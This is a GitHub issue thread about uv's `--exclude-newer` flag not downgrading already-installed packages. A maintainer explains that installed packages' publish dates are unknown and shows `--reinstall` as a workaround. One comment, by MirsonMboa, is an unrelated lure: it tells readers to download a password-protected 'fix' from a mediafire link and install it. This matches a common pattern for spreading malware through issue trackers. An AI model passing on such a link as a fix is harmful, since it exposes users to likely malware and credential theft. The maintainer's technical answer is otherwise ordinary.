### ISSUE TITLE
exclude-newer doesn't downgrade. should it?

### ISSUE THREAD

**Issue by davidszotten** [astral-sh/uv#6676]
i was expecting `--exclude-newer` to also downgrade installed packages, is that not the intended behaviour?

```
$ uv pip install --exclude-newer=2024-01-01 jinja2
Resolved 2 packages in 4ms
Installed 2 packages in 1ms
 + jinja2==3.1.2
 + markupsafe==2.1.3

$ uv pip install -U jinja2
Resolved 2 packages in 31ms
Prepared 2 packages in 0.28ms
Uninstalled 2 packages in 2ms
Installed 2 packages in 4ms
 - jinja2==3.1.2
 + jinja2==3.1.4
 - markupsafe==2.1.3
 + markupsafe==2.1.5

$ uv pip install --exclude-newer=2024-01-01 jinja2
Audited 1 package in 1ms        # <---- downgrade back to 3.1.2?

$ uv --version
uv 0.3.4 (39f3cd2a9 2024-08-26)
```

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by zanieb** [comment]
I don't think we can know the date that _already installed_ packages were published so I don't think the resolver will ever exclude them. You can use `--reinstall` to remove our preference for installed versions.

```
❯ uv pip install --exclude-newer=2024-01-01 jinja2 --reinstall
Resolved 2 packages in 144ms
Prepared 2 packages in 34ms
Uninstalled 2 packages in 3ms
Installed 2 packages in 2ms
 - jinja2==3.1.4
 + jinja2==3.1.2
 - markupsafe==2.1.5
 + markupsafe==2.1.3
```

**Comment by zanieb** [comment]
If you wanted to contribute this to the documentation as a hint in https://docs.astral.sh/uv/concepts/resolution/#reproducible-resolutions that'd be greatly appreciated.
